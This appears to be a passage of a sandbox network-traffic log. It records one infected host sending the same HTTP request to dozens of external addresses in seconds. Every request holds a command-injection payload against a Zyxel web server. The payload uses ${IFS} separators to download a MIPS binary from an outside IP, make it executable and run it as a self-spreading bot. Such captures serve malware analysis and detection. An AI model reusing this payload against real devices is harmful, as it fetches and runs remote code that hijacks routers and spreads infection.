                                    Jan 13, 2024 19:01:59.702996016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    511192.168.2.133860092.105.30.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703017950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    512192.168.2.1342342187.44.7.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703057051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    513192.168.2.1355072122.246.67.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703078985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    514192.168.2.1342400205.19.188.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703094006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    515192.168.2.1342664178.165.196.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703125954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    516192.168.2.1348970135.26.28.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703156948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    517192.168.2.135017097.53.51.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703202009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    518192.168.2.1339354123.20.53.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703226089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    519192.168.2.1342490202.140.151.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703253984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    520192.168.2.1358568169.234.61.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703309059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    521192.168.2.1359898115.244.37.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703349113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    522192.168.2.136040687.78.186.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703373909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    523192.168.2.136011293.151.216.142443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703403950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    524192.168.2.133473448.32.115.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703432083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    525192.168.2.1344674171.146.123.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703454018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    526192.168.2.1353714120.81.183.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703509092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    527192.168.2.1359402168.24.98.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703511000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    528192.168.2.1335658161.168.147.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703536034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    529192.168.2.1354748131.122.171.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703556061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    530192.168.2.1338366194.88.62.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703627110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    531192.168.2.134857049.39.119.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703639030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    532192.168.2.134055225.140.243.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703700066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    533192.168.2.134162075.73.216.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703732014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    534192.168.2.13453101.222.107.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703774929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    535192.168.2.1343832116.241.197.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703778982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    536192.168.2.135864644.69.33.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703799009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    537192.168.2.134163237.92.206.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703838110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    538192.168.2.1347130223.41.220.95443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703877926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    539192.168.2.1337088136.162.118.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703943014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    540192.168.2.1359374161.182.167.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703968048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    541192.168.2.1332782135.193.217.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.703988075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    542192.168.2.1357120158.39.108.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.704030037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    543192.168.2.135592231.114.187.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.704058886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    544192.168.2.134273892.36.64.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.704096079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    545192.168.2.1338368103.222.111.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:00.708400011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    546192.168.2.1347288180.9.246.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:00.708447933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    547192.168.2.134700080.148.89.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:00.708498955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    548192.168.2.1356494150.247.58.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:00.708520889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    549192.168.2.133466458.188.207.174443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:00.708580017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    550192.168.2.135238468.182.126.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:00.708597898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    551192.168.2.134997275.154.52.142443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:00.708622932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    552192.168.2.1351360145.86.227.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:00.708678007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    553192.168.2.1346746195.66.132.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:00.708702087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    554192.168.2.135411443.66.144.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:00.708743095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    555192.168.2.1333240102.23.80.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:00.708802938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    556192.168.2.136068681.145.84.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:00.708827019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    557192.168.2.134082087.249.162.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:00.708879948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    558192.168.2.135353490.175.5.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:00.709057093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    559192.168.2.133509473.150.125.234443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:00.709109068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    560192.168.2.1337456156.7.86.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:00.719995022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    561192.168.2.1345624128.125.154.143443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:00.720036030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    562192.168.2.1344884140.24.114.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:01.724051952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    563192.168.2.1348552184.103.118.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:01.724081039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    564192.168.2.1340142145.147.140.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:01.724119902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    565192.168.2.135315043.142.40.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:01.724174976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    566192.168.2.135943443.200.155.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:01.724205971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    567192.168.2.1337302126.69.103.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:01.724232912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    568192.168.2.135287237.199.32.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:01.724369049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    569192.168.2.134611477.116.26.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:02.729819059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    570192.168.2.1336522195.172.111.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:02.729870081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    571192.168.2.1346548123.99.251.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:02.729931116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    572192.168.2.1349846105.92.219.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:03.735589027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    573192.168.2.134383240.27.52.233443
                                    TimestampBytes transferredDirectionData
